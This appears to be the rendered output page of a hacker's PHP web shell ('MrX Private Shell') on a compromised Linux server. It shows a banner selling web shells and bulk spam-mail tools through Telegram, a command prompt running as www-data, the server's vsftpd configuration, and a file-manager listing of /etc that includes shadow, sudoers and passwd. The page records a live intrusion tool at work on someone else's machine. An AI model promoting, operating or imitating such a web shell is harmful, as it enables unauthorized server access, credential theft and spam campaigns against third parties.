__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.20: ~ $
# Example config file /etc/vsftpd.conf
#
# The default compiled in settings are fairly paranoid. This sample file
# loosens things up a bit, to make the ftp daemon more usable.
# Please see vsftpd.conf.5 for all compiled in defaults.
#
# READ THIS: This example file is NOT an exhaustive list of vsftpd options.
# Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
# capabilities.
#
#
# Run standalone?  vsftpd can run either from an inetd or as a standalone
# daemon started from an initscript.
listen=NO
#
# This directive enables listening on IPv6 sockets. By default, listening
# on the IPv6 "any" address (::) will accept connections from both IPv6
# and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6
# sockets. If you want that (perhaps because you want to listen on specific
# addresses) then you must run two copies of vsftpd with two configuration
# files.
listen_ipv6=YES
#
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=NO
#
# Uncomment this to allow local users to log in.
local_enable=YES
#
# Uncomment this to enable any form of FTP write command.
write_enable=YES
#
# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
#local_umask=022
#
# Uncomment this to allow the anonymous FTP user to upload files. This only
# has an effect if the above global write enable is activated. Also, you will
# obviously need to create a directory writable by the FTP user.
#anon_upload_enable=YES
#
# Uncomment this if you want the anonymous FTP user to be able to create
# new directories.
#anon_mkdir_write_enable=YES
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES
#
# If enabled, vsftpd will display directory listings with the time
# in  your  local  time  zone.  The default is to display GMT. The
# times returned by the MDTM FTP command are also affected by this
# option.
use_localtime=YES
#
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
#
# If you want, you can arrange for uploaded anonymous files to be owned by
# a different user. Note! Using "root" for uploaded files is not
# recommended!
#chown_uploads=YES
#chown_username=whoever
#
# You may override where the log file goes if you like. The default is shown
# below.
#xferlog_file=/var/log/vsftpd.log
#
# If you want, you can have your log file in standard ftpd xferlog format.
# Note that the default log file location is /var/log/xferlog in this case.
#xferlog_std_format=YES
#
# You may change the default value for timing out an idle session.
#idle_session_timeout=600
#
# You may change the default value for timing out a data connection.
#data_connection_timeout=120
#
# It is recommended that you define on your system a unique user which the
# ftp server can use as a totally isolated and unprivileged user.
#nopriv_user=ftpsecure
#
# Enable this and the server will recognise asynchronous ABOR requests. Not
# recommended for security (the code is non-trivial). Not enabling it,
# however, may confuse older FTP clients.
#async_abor_enable=YES
#
# By default the server will pretend to allow ASCII mode but in fact ignore
# the request. Turn on the below options to have the server actually do ASCII
# mangling on files when in ASCII mode.
# Beware that on some FTP servers, ASCII support allows a denial of service
# attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
# predicted this attack and has always been safe, reporting the size of the
# raw file.
# ASCII mangling is a horrible feature of the protocol.
#ascii_upload_enable=YES
#ascii_download_enable=YES
#
# You may fully customise the login banner string:
#ftpd_banner=Welcome to blah FTP service.
#
# You may specify a file of disallowed anonymous e-mail addresses. Apparently
# useful for combatting certain DoS attacks.
#deny_email_enable=YES
# (default follows)
#banned_email_file=/etc/vsftpd.banned_emails
#
# You may restrict local users to their home directories.  See the FAQ for
# the possible risks in this before using chroot_local_user or
# chroot_list_enable below.
#chroot_local_user=YES
#
# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
# users to NOT chroot().
# (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
# the user does not have write access to the top level directory within the
# chroot)
#chroot_local_user=YES
#chroot_list_enable=YES
# (default follows)
#chroot_list_file=/etc/vsftpd.chroot_list
#
# You may activate the "-R" option to the builtin ls. This is disabled by
# default to avoid remote users being able to cause excessive I/O on large
# sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
# the presence of the "-R" option, so there is a strong case for enabling it.
#ls_recurse_enable=YES
#
# Customization
#
# Some of vsftpd's settings don't fit the filesystem layout by
# default.
#
# This option should be the name of a directory which is empty.  Also, the
# directory should not be writable by the ftp user. This directory is used
# as a secure chroot() jail at times vsftpd does not require filesystem
# access.
secure_chroot_dir=/var/run/vsftpd/empty
#
# This string is the name of the PAM service vsftpd will use.
pam_service_name=vsftpd
#
# This option specifies the location of the RSA certificate to use for SSL
# encrypted connections.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO

#
# Uncomment this to indicate that vsftpd use a utf8 filesystem.
#utf8_filesystem=YES
force_dot_files=YES

Filemanager

Name Type Size Permission Actions
ImageMagick-6 Folder 0755
ModemManager Folder 0755
NetworkManager Folder 0755
ODBCDataSources Folder 0755
PackageKit Folder 0755
UPower Folder 0755
X11 Folder 0755
alsa Folder 0755
alternatives Folder 0755
apache2 Folder 0755
apparmor Folder 0755
apparmor.d Folder 0755
apt Folder 0755
avahi Folder 0755
bash_completion.d Folder 0755
bind Folder 2755
binfmt.d Folder 0755
bluetooth Folder 0755
ca-certificates Folder 0755
chatscripts Folder 2750
chromium Folder 0755
chromium.d Folder 0755
cifs-utils Folder 0755
console-setup Folder 0755
cracklib Folder 0755
cron.d Folder 0755
cron.daily Folder 0755
cron.hourly Folder 0755
cron.monthly Folder 0755
cron.weekly Folder 0755
cron.yearly Folder 0755
cups Folder 0755
cupshelpers Folder 0755
dbconfig-common Folder 0755
dbus-1 Folder 0755
dconf Folder 0755
debuginfod Folder 0755
default Folder 0755
dhcp Folder 0755
dictionaries-common Folder 0755
dillo Folder 0755
dpkg Folder 0755
emacs Folder 0755
environment.d Folder 0755
firefox Folder 0755
fonts Folder 0755
gdb Folder 0755
geoclue Folder 0755
ghostscript Folder 0755
glvnd Folder 0755
gnome Folder 0755
groff Folder 0755
gss Folder 0755
gtk-2.0 Folder 0755
gtk-3.0 Folder 0755
hp Folder 0755
ifplugd Folder 0755
init.d Folder 0755
initramfs Folder 0755
initramfs-tools Folder 0755
insserv.conf.d Folder 0755
ipp-usb Folder 0755
iproute2 Folder 0755
issue.d Folder 0755
kernel Folder 0755
keyutils Folder 0755
ld.so.conf.d Folder 0755
ldap Folder 0755
letsencrypt Folder 0755
libblockdev Folder 0755
libibverbs.d Folder 0755
libnl-3 Folder 0755
libpaper.d Folder 0755
lightdm Folder 0755
lighttpd Folder 0755
logcheck Folder 0755
logrotate.d Folder 0755
lynx Folder 0755
menu-methods Folder 0755
modprobe.d Folder 0755
modules-load.d Folder 0755
mplayer Folder 0755
mysql Folder 0755
network Folder 0755
nfs.conf.d Folder 0755
ntpsec Folder 0755
openal Folder 0755
openni2 Folder 0755
opt Folder 0755
pam.d Folder 0755
perl Folder 0755
php Folder 0755
phpmyadmin Folder 0755
plymouth Folder 0755
polkit-1 Folder 0755
ppp Folder 0755
profile.d Folder 0755
pulse Folder 0755
python3 Folder 0755
python3.11 Folder 0755
rc0.d Folder 0755
rc1.d Folder 0755
rc2.d Folder 0755
rc3.d Folder 0755
rc4.d Folder 0755
rc5.d Folder 0755
rc6.d Folder 0755
rcS.d Folder 0755
request-key.d Folder 0755
rpi-connect Folder 0755
rsyslog.d Folder 0755
runit Folder 0755
samba Folder 0755
sane.d Folder 0755
security Folder 0755
selinux Folder 0755
sensors.d Folder 0755
sgml Folder 0755
signon-ui Folder 0755
skel Folder 0755
smartmontools Folder 0755
snmp Folder 0755
ssh Folder 0755
ssl Folder 0755
sudoers.d Folder 0755
sv Folder 0755
sysctl.d Folder 0755
systemd Folder 0755
terminfo Folder 0755
timidity Folder 0755
tmpfiles.d Folder 0755
tor Folder 0755
triggerhappy Folder 0755
udev Folder 0755
udisks2 Folder 0755
ufw Folder 0755
update-motd.d Folder 0755
usb_modeswitch.d Folder 0755
vim Folder 0755
vnc Folder 0755
vulkan Folder 0755
w3m Folder 0755
wayfire Folder 0755
wayvnc Folder 0755
webalizer Folder 0755
wpa_supplicant Folder 0755
xdg Folder 0755
xml Folder 0755
xsettingsd Folder 0755
.fstab File 216 B 0644
.pwd.lock File 0 B 0600
RTIMULib.ini File 11.82 KB 0644
adduser.conf File 2.97 KB 0644
apg.conf File 433 B 0644
bash.bashrc File 1.95 KB 0644
bash_completion File 45 B 0644
bindresvport.blacklist File 367 B 0644
ca-certificates.conf File 5.96 KB 0644
ca-certificates.conf.dpkg-old File 5.85 KB 0644
catdocrc File 119 B 0644
crontab File 1.92 KB 0644
debconf.conf File 2.9 KB 0644
debian_version File 6 B 0644
deluser.conf File 1.67 KB 0644
dphys-swapfile File 1.08 KB 0644
e2scrub.conf File 685 B 0644
environment File 0 B 0644
ethertypes File 1.81 KB 0644
fake-hwclock.data File 20 B 0644
fb.modes File 23.93 KB 0644
fstab File 314 B 0644
ftpusers File 132 B 0644
fuse.conf File 694 B 0644
gai.conf File 2.52 KB 0644
gprofng.rc File 3.79 KB 0644
group File 1.14 KB 0644
group- File 1.13 KB 0644
gshadow File 985 B 0640
gshadow- File 973 B 0640
host.conf File 9 B 0644
hostname File 5 B 0644
hosts File 187 B 0644
hosts.allow File 411 B 0644
hosts.deny File 711 B 0644
idmapd.conf File 171 B 0644
inputrc File 1.95 KB 0644
issue File 27 B 0644
issue.net File 20 B 0644
kernel-img.conf File 14 B 0644
ld.so.cache File 92.84 KB 0644
ld.so.conf File 34 B 0644
libao.conf File 26 B 0644
libaudit.conf File 191 B 0644
locale.alias File 2.93 KB 0644
locale.gen File 9.21 KB 0644
localtime File 1.41 KB 0644
login.defs File 12.31 KB 0644
logrotate.conf File 494 B 0644
machine-id File 33 B 0444
magic File 111 B 0644
magic.mime File 111 B 0644
mailcap File 50.81 KB 0644
mailcap.order File 449 B 0644
manpath.config File 5.11 KB 0644
mime.types File 72.04 KB 0644
mke2fs.conf File 782 B 0644
modules File 256 B 0644
motd File 286 B 0644
mtab File 0 B 0444
nanorc File 11.16 KB 0644
netconfig File 767 B 0644
networks File 60 B 0644
nfs.conf File 1.41 KB 0644
nftables.conf File 243 B 0755
nsswitch.conf File 537 B 0644
odbc.ini File 0 B 0644
odbcinst.ini File 0 B 0644
os-release File 267 B 0644
pam.conf File 552 B 0644
papersize File 3 B 0644
passwd File 2.17 KB 0644
passwd- File 2.12 KB 0644
pip.conf File 57 B 0644
printcap File 135 B 0644
profile File 801 B 0644
protocols File 3.07 KB 0644
request-key.conf File 1.75 KB 0644
resolv.conf File 96 B 0644
resolv.conf.tail File 51 B 0644
rmt File 66.86 KB 0755
rpc File 911 B 0644
rpi-issue File 145 B 0644
rygel.conf File 5.49 KB 0644
sensors3.conf File 10.34 KB 0644
services File 12.51 KB 0644
shadow File 1.12 KB 0640
shadow- File 1.12 KB 0640
shells File 128 B 0644
smartd.conf File 6.88 KB 0644
subgid File 22 B 0644
subuid File 22 B 0644
sudo.conf File 4.24 KB 0644
sudo_logsrvd.conf File 9.57 KB 0644
sudoers File 1.67 KB 0440
sysctl.conf File 2.3 KB 0644
timezone File 18 B 0644
ts.conf File 938 B 0644
ucf.conf File 1.23 KB 0644
usb_modeswitch.conf File 1.49 KB 0644
vdpau_wrapper.cfg File 51 B 0644
vsftpd.conf File 5.73 KB 0644
wgetrc File 4.83 KB 0644
xattr.conf File 681 B 0644
Filemanager